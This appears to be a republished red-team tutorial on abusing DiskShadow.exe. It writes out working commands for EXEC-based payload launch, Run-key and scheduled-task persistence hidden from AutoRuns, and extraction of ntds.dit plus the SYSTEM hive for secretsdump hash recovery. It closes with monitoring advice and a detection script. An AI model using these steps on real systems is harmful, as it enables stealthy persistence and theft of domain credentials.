
How to use the DiskShadow service for AV-evading persistence and Active Directory database extraction

2025-04-04 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 06/02 Report

This article explains how the DiskShadow service can be used for AV-evading persistence and for extracting the Active Directory database. The technique is practical, so it is shared here step by step; hopefully you will take something away from it.

Introduction to DiskShadow Service

DiskShadow.exe is a command-line tool for managing the Volume Shadow Copy Service (VSS). VSS lets you create a point-in-time copy of the data on specific volumes so that the data can be recovered later after a loss, and DiskShadow uses an interactive command interpreter similar to DiskRaid or DiskPart. DiskShadow ships with Windows Server 2008, 2012 and 2016 as the first in-box VSS requester for hardware shadow copy solutions, and it can create and manage both hardware and software shadow copies. DiskShadow also provides a script mode. (See the tool's documentation on Microsoft's website.)

The VSS operations that DiskShadow manages require UAC elevation, but ordinary users can still run some of its commands, which makes DiskShadow a good candidate for command execution and AV-evading persistence.

DiskShadow executes commands

Both the interactive command interpreter and script mode support the EXEC command, and both privileged and unprivileged users can launch commands and batch scripts from interactive mode or from a script file, as the following demonstrations show.

Note: the following examples were run from a non-privileged, non-administrator account on a freshly installed or updated Windows Server 2016; the behaviour depends on the system version and configuration. To reproduce them, make sure the system and the application are intact.

Interactive mode

In the following example, a normal user runs calc.exe from within DiskShadow:

Script mode

In the following example, a normal user starts calc.exe and notepad.exe by running the script file diskshadow.txt:

diskshadow.exe /s c:\test\diskshadow.txt

Like Vshadow, DiskShadow.exe can spawn child processes, and DiskShadow.exe keeps running after the child process exits.

Autostart persistence and AV evasion

Because DiskShadow is a signed Windows system binary, let's combine it with some other persistence and AV-evasion AutoRuns techniques and see what can be learned. In the next example we update the script and create a Run key and a scheduled task.

Preparation in advance

Since the DiskShadow features used above are "window responsive" (for example, a command window pops up), we need to change the script to invoke pass-through-style execution of external commands, and to terminate the DiskShadow parent process and the subsequent payload promptly. This technique is not very stealthy if the window stays open too long, but a window that appears briefly at user logon may simply be ignored by the user.

First, change the script diskshadow.txt to perform the basic program invocation. To get command execution, we use the EXEC command in its basic form:

EXEC "cmd.exe" /c c:\test\evil.exe

Next, add the following hidden persistence entries, one in the registry and one in the task scheduler:

-Run Key Value-

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VSSRun /t REG_EXPAND_SZ /d "diskshadow.exe /s c:\test\diskshadow.txt"

-User Level Scheduled Task-

schtasks /create /sc hourly /tn VSSTask /tr "diskshadow.exe /s c:\test\diskshadow.txt"

After that, we can see how it works.

AutoRuns: the concealment effect seen from the registry key

After creating the hidden persistence key, opening the Logon tab of AutoRuns shows that our entry is hidden: by default this view does not display entries with verified Windows signatures:

But after unchecking "Hide Microsoft Entries", the autostart entry we defined is visible in AutoRuns:

AutoRuns: the concealment effect seen from the scheduled task

As with the registry key, the scheduled task we created is hidden under the default view of the Scheduled Tasks tab:

Again, after unchecking "Hide Microsoft Entries", the entry we defined is visible in AutoRuns:

Extract Active Directory data

Since DiskShadow itself is a shadow copy management tool, let's look at how the Active Directory database ntds.dit can be extracted through its shadow copy functions. NTDS.DIT is a binary file, the domain equivalent of a local computer's SAM file. It is stored at %SystemRoot%\ntds\NTDS.DIT and contains not only usernames and hashes but also OUs, groups, and so on.

In the following scenario we assume that the attacker has already taken control of the Active Directory domain controller and can run DiskShadow commands in script mode from a privileged user context. First we need to prepare the script: identify the drive letter of the volume holding the Active Directory database, and pick a drive letter that the system is not already using. Here is the content of the script diskshadow.txt:

set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
delete shadows volume %someAlias%
reset

In this script we create a persistent shadow copy of the C: volume, expose it as the drive letter Z: as a cover, and perform a copy operation to obtain the sensitive file. Because the shadow copy is mounted as a drive, the copy path of the target file is known, and the target file must be copied to the "exfil" directory before the shadow copy is deleted. (See the DiskShadow command reference.)

Note that the target file can also be copied by referring to the shadow device name or its unique identifier, which is stealthier, but the target file's label and UUID must be correct and the script must remain valid; this approach is better suited to interactive mode.

The DiskShadow command and the final result are as follows:

type c:\diskshadow.txt

diskshadow.exe /s c:\diskshadow.txt

dir c:\exfil

In addition to the Active Directory database, the registry hive of the target system can be extracted as well:

reg.exe save hklm\system c:\exfil\system.bak

Once ntds.dit and system.bak have been extracted from the target system, the NTLM hashes they contain can be recovered with the script secretsdump.py:

secretsdump.py -ntds ntds.dit -system system.bak LOCAL

Usability comparison between DiskShadow and Vshadow

The functions of DiskShadow.exe and Vshadow.exe are similar, but there are essential differences in how they are applied, and one can be chosen according to the requirements and the actual environment.

Operating system compatibility

DiskShadow.exe has been built into the operating system since Windows Server 2008, while Vshadow.exe is only available in the Windows SDK. If the Windows SDK is installed on the target system, Vshadow.exe can be used, but in some real operating system environments DiskShadow.exe is the better fit.

Functionality and practicality

In a normal user environment, some DiskShadow features can be used without privileges. In the Vshadow test scenario I published earlier, Vshadow may be affected by permissions and some features cannot be used properly. By comparison, DiskShadow is more flexible and reliable in command interaction.

Command-line usage

Vshadow is relatively "command-line friendly", whereas DiskShadow requires interactive commands or a script file for certain functions. Therefore, over some remote-control channels to the target system, such as a backdoor, running DiskShadow commands may be limited, and creating files or scripts on the target system may be detected. In some environments with high security requirements, Vshadow is therefore the more covert and effective choice.

Autostart persistence and AV evasion

In the Vshadow article I published earlier, I mentioned that Vshadow is signed with a Microsoft certificate, that is, unless "Hide Microsoft Entries" is set in the autostart monitoring view it may be found, while DiskShadow is signed with the Windows system certificate and can be hidden to some extent, which is relatively better.

Extracting the Active Directory database

If the extraction operation fails (for example, the shadow disk name is not what we expect) and DiskShadow is only usable in script mode, other additional means may be needed to extract the AD database. Besides creating and running a script file, a logical drive may need to be mapped on the target machine to copy ntds.dit, which carries some risk of detection; Vshadow handles this case relatively better.

Summary

Overall, DiskShadow appears more widely available and practical, but Vshadow and other VSS-based methods are also viable. To defend against DiskShadow attacks, blue teams and security administrators may consider the following measures:

Monitor the Volume Shadow Copy Service (VSS), especially unexpected shadow copy creation and deletion and other suspicious activity involving the Active Directory database file ntds.dit

Monitor suspicious occurrences of System Event ID 7036 (Volume Shadow Copy Service entering the running state) and starts of the VSSVC.exe process

Monitor the creation behavior of the Diskshadow.exe process and its child processes

Monitor process integrity levels; a Diskshadow.exe process running at medium integrity (that is, without elevation) may indicate misuse

Monitor Diskshadow.exe process creation on endpoints; unless required by the business, Diskshadow.exe should not be running on a Windows system

Monitor new logical drive mapping events

Implement application whitelisting to control which applications may run and to prevent command execution from within the Diskshadow.exe process

Maintain good information security practices and raise employees' security awareness
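As an added illustration of the monitoring points above (not part of the original article), the following Python triages constructed process-creation events and a DiskShadow script for the indicators listed: diskshadow.exe running in script mode, medium integrity, child processes spawned through EXEC, and references to ntds.dit. The event fields are an assumed, simplified Sysmon-like shape; the script text is the one shown earlier in the article.

```python
import ntpath
from typing import Dict, List

# Constructed sample process-creation events (simplified, assumed Sysmon-like shape)
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\diskshadow.exe",
     "CommandLine": r"diskshadow.exe /s c:\test\diskshadow.txt",
     "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "Medium"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit",
     "ParentImage": r"C:\Windows\System32\diskshadow.exe", "IntegrityLevel": "High"},
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "Medium"},
]

# The extraction script from the article, used here only as sample input
SAMPLE_SCRIPT = r"""set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
delete shadows volume %someAlias%
reset
"""

def triage_event(ev: Dict[str, str]) -> List[str]:
    """Return the reasons an event is suspicious; an empty list means no match."""
    reasons: List[str] = []
    cmd = ev.get("CommandLine", "").lower()
    if ntpath.basename(ev["Image"]).lower() == "diskshadow.exe":
        reasons.append("diskshadow.exe started")
        if "/s" in cmd.split():  # script mode: a script file is being executed
            reasons.append("script mode (/s) with a script file")
        if ev.get("IntegrityLevel", "").lower() == "medium":
            reasons.append("medium integrity: non-elevated use")
    if ntpath.basename(ev["ParentImage"]).lower() == "diskshadow.exe":
        reasons.append("child process of diskshadow.exe (EXEC)")
    if "ntds.dit" in cmd:
        reasons.append("command line references ntds.dit")
    return reasons

def triage_script(text: str) -> List[str]:
    """Flag the DiskShadow script verbs that matter for AD database extraction."""
    verbs = {ln.split()[0].lower() for ln in text.splitlines() if ln.split()}
    labels = {"create": "creates a shadow copy", "expose": "maps the shadow copy to a drive letter",
              "exec": "executes an external command", "delete": "deletes the shadow copy (cleanup)"}
    findings = [msg for verb, msg in labels.items() if verb in verbs]
    if "ntds.dit" in text.lower():
        findings.append("references ntds.dit")
    return findings
```

The same checks map directly onto process-creation telemetry (Sysmon Event ID 1 or Security Event ID 4688 with command-line logging) and onto script files found on disk.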

That covers how the DiskShadow service can be used for AV-evading persistence and Active Directory database extraction. Some of these points may come up in daily work, and hopefully this article has been useful.
